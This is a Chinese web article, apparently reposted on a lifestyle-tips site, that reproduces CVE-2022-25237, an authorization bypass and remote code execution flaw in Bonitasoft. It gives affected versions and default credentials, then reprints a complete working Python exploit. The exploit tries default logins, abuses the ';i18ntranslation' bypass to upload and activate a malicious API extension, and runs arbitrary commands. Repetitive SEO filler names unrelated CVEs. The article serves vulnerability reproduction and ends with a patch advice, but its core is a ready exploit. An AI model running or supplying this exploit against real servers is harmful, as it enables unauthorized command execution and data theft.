花匠人从多个角度为你分享Bonitasoft Platform RCE漏洞复现(CVE-2022-25237)(cve-2016-2183漏洞复现),让你更加了解Bonitasoft Platform RCE漏洞复现(CVE-2022-25237)(cve-2016-2183漏洞复现),包含生活百科相关的生活技巧、生活小窍门、生活小妙招等生活百科知识。
本篇文章为你整理了Bonitasoft Platform RCE漏洞复现(CVE-2022-25237)(cve-2016-2183漏洞复现)的详细内容,包含有Bonitasoft Platform RCE漏洞复现(CVE-2022-25237) cve-2011-3556漏洞复现 cve-2020-14750漏洞复现 uaf漏洞等,让你从多个方面了解Bonitasoft Platform RCE漏洞复现(CVE-2022-25237)(cve-2016-2183漏洞复现),希望对你有帮助。
1、产品简介 Bonitasoft 是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita 是一个用于业务流程自动化和优化的开源和可扩展平台。
2、漏洞概述 在Bonitasoft Authorization漏洞版本,由于 API 授权过滤器中配置问题,通过精心构造的的字符串附加到 API URL,能够绕过权限认证。拥有普通用户权限的攻击者在绕过权限认证后,将恶意代码部署到服务器上,进行远程代码执行。
3、影响范围 For community(社区版): 2022.1-u0 (7.14.0) 以下
For subscription(订阅版): 2022.1-u0 (7.14.0) 以下
2021.2-u4 (7.13.4) 以下
2021.1-0307 (7.12.11) 以下
7.11.7 以下
4、环境搭建 vulfocus在线靶场进行复现
5、利用流程 1、访问靶场环境,使用默认账号密码:install/install 登录页面;
2、创建普通用户
3、利用某大佬写的poc
项目地址:CVEs/CVE-2022-25237 at master · RhinoSecurityLabs/CVEs · GitHub
# ## Information# **Description:** This vulnerability allows authorization bypass and remote code exection in Bonitasoft web. # **Versions Affected:** 2022.1 # **Version Fixed:** # For community:# - 2022.1-u0 (7.14.0)# For subscription:# - 2022.1-u0 (7.14.0)# - 2021.2-u4 (7.13.4)# - 2021.1-0307 (7.12.11)# - 7.11.7 # **Researcher:** David Yesland (https://twitter.com/daveysec) # **Disclosure Link:** https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/ # **NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2022-25237 import requestsimport sysclass exploit: try: session = requests.session() bonita_user = sys.argv[1] bonita_password = sys.argv[2] target_path = sys.argv[3] cmd = sys.argv[4] tempPath = "" extension_id = "" bonita_default_user = "install" bonita_default_password = "install" platform_default_user = "platformAdmin" platform_default_password = "platform" except: print(f"Usage: python3 {sys.argv[0]} http://localhost:8080/bonita cat /etc/passwd") exit()def try_default_logins(): req_url = f"{exploit.target_path}/loginservice" req_cookies = {"x": "x"} req_headers = {"Content-Type": "application/x-www-form-urlencoded"} req_data = {"username": exploit.bonita_default_user, "password": exploit.bonita_default_password, "_l": "en"} r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data) if r.status_code == 401: return False # This does not seem to work when authenticating as platformAdmin, maybe it can though. # req_url = f"{exploit.target_path}/platformloginservice" # req_cookies = {"x": "x"} # req_headers = {"Content-Type": "application/x-www-form-urlencoded"} # req_data = {"username": exploit.platform_default_user, "password": exploit.platform_default_password, "_l": "en"} # r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data) # if r.status_code == 200: # print(f"[+] Found default creds: {exploit.platform_default_user}:{exploit.platform_default_password}") # return True else: print(f"[+] Found default creds: {exploit.bonita_default_user}:{exploit.bonita_default_password}") return Truedef login(): req_url = f"{exploit.target_path}/loginservice" req_cookies = {"x": "x"} req_headers = {"Content-Type": "application/x-www-form-urlencoded"} req_data = {"username": exploit.bonita_user, "password": exploit.bonita_password, "_l": "en"} r = exploit.session.post(req_url, headers=req_headers, cookies=req_cookies, data=req_data) if r.status_code == 401: print("[!] Could not get a valid session using those credentials.") exit() else: print(f"[+] Authenticated with {exploit.bonita_user}:{exploit.bonita_password}")def upload_api_extension(): req_url = f"{exploit.target_path}/API/pageUpload;i18ntranslation?action=add" files=[ ("file",("rce_api_extension.zip",open("rce_api_extension.zip",rb),application/octet-stream)) ] r = exploit.session.post(req_url, files=files) exploit.tempPath = r.json()["tempPath"]def activate_api_extension(): req_url = f"{exploit.target_path}/API/portal/page/;i18ntranslation" req_headers = {"Content-Type": "application/json;charset=UTF-8"} req_json={"contentName": "rce_api_extension.zip", "pageZip": exploit.tempPath} r = exploit.session.post(req_url, headers=req_headers, json=req_json) exploit.extension_id = r.json()["id"]def delete_api_extension(): req_url = f"{exploit.target_path}/API/portal/page/{exploit.extension_id};i18ntranslation" exploit.session.delete(req_url)def run_cmd(): req_url = f"{exploit.target_path}/API/extension/rce?p=0&c=1&cmd={exploit.cmd}" r = exploit.session.get(req_url) print(r.json()["out"])if not try_default_logins(): print("[!] Did not find default creds, trying supplied credentials.") login()upload_api_extension()activate_api_extension()try: run_cmd()except: delete_api_extension()delete_api_extension()
注意事项:CVE-2022-25237.py 和 rce_api_extension.zip文件放一个目录下
6、修复建议 更新至安全版本。
以上就是Bonitasoft Platform RCE漏洞复现(CVE-2022-25237)(cve-2016-2183漏洞复现)的全部内容,想要了解更多Bonitasoft Platform RCE漏洞复现(CVE-2022-25237)(cve-2016-2183漏洞复现)相关的内容,请持续关注我们。
以上就是花匠人为你整理的Bonitasoft Platform RCE漏洞复现(CVE-2022-25237)(cve-2016-2183漏洞复现),如果你还想了解更多生活百科知识,请持续关注花匠人。
郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时间联系我们修改或删除,多谢。